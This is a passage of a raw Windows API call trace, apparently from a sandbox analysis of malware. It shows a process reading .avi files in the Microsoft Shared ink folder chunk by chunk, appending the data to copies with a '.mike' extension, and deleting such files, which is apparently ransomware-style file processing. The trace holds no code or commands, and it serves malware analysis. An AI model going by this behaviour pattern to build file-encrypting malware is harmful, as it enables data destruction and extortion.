lpOldMode=0x2af134) returned 1 [0044.717] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", lpFilePart=0x0) returned 0x44 [0044.717] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", dwFileAttributes=0x80) returned 0 [0044.718] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", lpFilePart=0x0) returned 0x44 [0044.718] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", lpFilePart=0x0) returned 0x49 [0044.718] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0044.718] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0a4 | out: lpFileInformation=0x2af0a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4c195a0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe4c195a0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe4dbc4c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x30420)) returned 1 [0044.718] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0044.718] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", lpFilePart=0x0) returned 0x44 [0044.719] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", lpFilePart=0x0) returned 0x49 [0044.719] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.mike")) returned 1 [0044.721] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", lpFilePart=0x0) returned 0x43 [0044.721] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", lpFilePart=0x0) returned 0x43 [0044.721] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", lpFilePart=0x0) returned 0x43 [0044.721] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0044.721] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0044.728] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0044.728] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", nBufferLength=0x105, lpBuffer=0x2aeb18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", lpFilePart=0x0) returned 0x43 [0044.729] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0044.729] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.729] GetFileType (hFile=0x264) returned 0x1 [0044.729] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0044.729] GetFileType (hFile=0x264) returned 0x1 [0044.729] CloseHandle (hObject=0x264) returned 1 [0044.729] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", lpFilePart=0x0) returned 0x43 [0044.729] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", lpFilePart=0x0) returned 0x43 [0044.729] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec14, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0044.729] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0044.729] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0044.729] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0044.730] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0044.730] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), fInfoLevelId=0x0, lpFileInformation=0x2117324 | out: lpFileInformation=0x2117324*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24be76b, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x24be76b, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a5845f5, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x36c00)) returned 1 [0044.730] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0044.730] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", lpFilePart=0x0) returned 0x43 [0044.730] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0044.730] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), fInfoLevelId=0x0, lpFileInformation=0x211762c | out: lpFileInformation=0x211762c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24be76b, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x24be76b, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a5845f5, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x36c00)) returned 1 [0044.730] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0044.730] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", lpFilePart=0x0) returned 0x43 [0044.730] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", lpFilePart=0x0) returned 0x48 [0044.730] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0044.730] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0044.730] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0044.730] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", lpFilePart=0x0) returned 0x43 [0044.730] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", lpFilePart=0x0) returned 0x43 [0044.730] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", lpFilePart=0x0) returned 0x43 [0044.731] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", lpFilePart=0x0) returned 0x48 [0044.731] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0044.731] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0d4 | out: lpFileInformation=0x2af0d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0044.731] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0044.731] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", lpFilePart=0x0) returned 0x48 [0044.731] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.731] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.731] GetFileType (hFile=0x264) returned 0x1 [0044.731] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.731] GetFileType (hFile=0x264) returned 0x1 [0044.731] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x0 [0044.731] WriteFile (in: hFile=0x264, lpBuffer=0x2118428*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2118428*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0044.732] CloseHandle (hObject=0x264) returned 1 [0044.732] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0044.733] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), fInfoLevelId=0x0, lpFileInformation=0x2117f48 | out: lpFileInformation=0x2117f48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24be76b, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x24be76b, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a5845f5, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x36c00)) returned 1 [0044.733] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0044.733] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", lpFilePart=0x0) returned 0x43 [0044.733] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.733] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.733] GetFileType (hFile=0x264) returned 0x1 [0044.733] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.733] GetFileType (hFile=0x264) returned 0x1 [0044.733] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0044.733] ReadFile (in: hFile=0x264, lpBuffer=0x2119548, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2119548*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.736] CloseHandle (hObject=0x264) returned 1 [0044.736] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", lpFilePart=0x0) returned 0x48 [0044.737] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.737] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.737] GetFileType (hFile=0x264) returned 0x1 [0044.737] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.737] GetFileType (hFile=0x264) returned 0x1 [0044.737] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x220 [0044.737] WriteFile (in: hFile=0x264, lpBuffer=0x2123ab0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x2123ab0*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.737] CloseHandle (hObject=0x264) returned 1 [0044.738] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", lpFilePart=0x0) returned 0x43 [0044.738] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.738] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.738] GetFileType (hFile=0x264) returned 0x1 [0044.738] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.738] GetFileType (hFile=0x264) returned 0x1 [0044.738] SetFilePointer (in: hFile=0x264, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2800 [0044.738] ReadFile (in: hFile=0x264, lpBuffer=0x21264f8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21264f8*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.738] CloseHandle (hObject=0x264) returned 1 [0044.739] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", lpFilePart=0x0) returned 0x48 [0044.739] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.739] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.739] GetFileType (hFile=0x264) returned 0x1 [0044.739] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.739] GetFileType (hFile=0x264) returned 0x1 [0044.739] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2a20 [0044.740] WriteFile (in: hFile=0x264, lpBuffer=0x2130a60*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x2130a60*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.740] CloseHandle (hObject=0x264) returned 1 [0044.741] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", lpFilePart=0x0) returned 0x43 [0044.741] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.741] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.741] GetFileType (hFile=0x264) returned 0x1 [0044.741] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.741] GetFileType (hFile=0x264) returned 0x1 [0044.741] SetFilePointer (in: hFile=0x264, lDistanceToMove=20480, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x5000 [0044.741] ReadFile (in: hFile=0x264, lpBuffer=0x21334a8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21334a8*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.741] CloseHandle (hObject=0x264) returned 1 [0044.742] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", lpFilePart=0x0) returned 0x48 [0044.742] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.742] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.742] GetFileType (hFile=0x264) returned 0x1 [0044.742] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.742] GetFileType (hFile=0x264) returned 0x1 [0044.742] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x5220 [0044.742] WriteFile (in: hFile=0x264, lpBuffer=0x213da10*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x213da10*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.742] CloseHandle (hObject=0x264) returned 1 [0044.743] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", lpFilePart=0x0) returned 0x43 [0044.743] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.743] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.743] GetFileType (hFile=0x264) returned 0x1 [0044.743] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.743] GetFileType (hFile=0x264) returned 0x1 [0044.744] SetFilePointer (in: hFile=0x264, lDistanceToMove=30720, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x7800 [0044.744] ReadFile (in: hFile=0x264, lpBuffer=0x2140458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2140458*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.744] CloseHandle (hObject=0x264) returned 1 [0044.744] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", lpFilePart=0x0) returned 0x48 [0044.744] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.744] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.744] GetFileType (hFile=0x264) returned 0x1 [0044.745] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.745] GetFileType (hFile=0x264) returned 0x1 [0044.745] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x7a20 [0044.745] WriteFile (in: hFile=0x264, lpBuffer=0x214a9c0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x214a9c0*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.745] CloseHandle (hObject=0x264) returned 1 [0044.746] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", lpFilePart=0x0) returned 0x43 [0044.746] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.746] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.746] GetFileType (hFile=0x264) returned 0x1 [0044.746] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.746] GetFileType (hFile=0x264) returned 0x1 [0044.746] SetFilePointer (in: hFile=0x264, lDistanceToMove=40960, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0xa000 [0044.746] ReadFile (in: hFile=0x264, lpBuffer=0x214d408, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x214d408*, 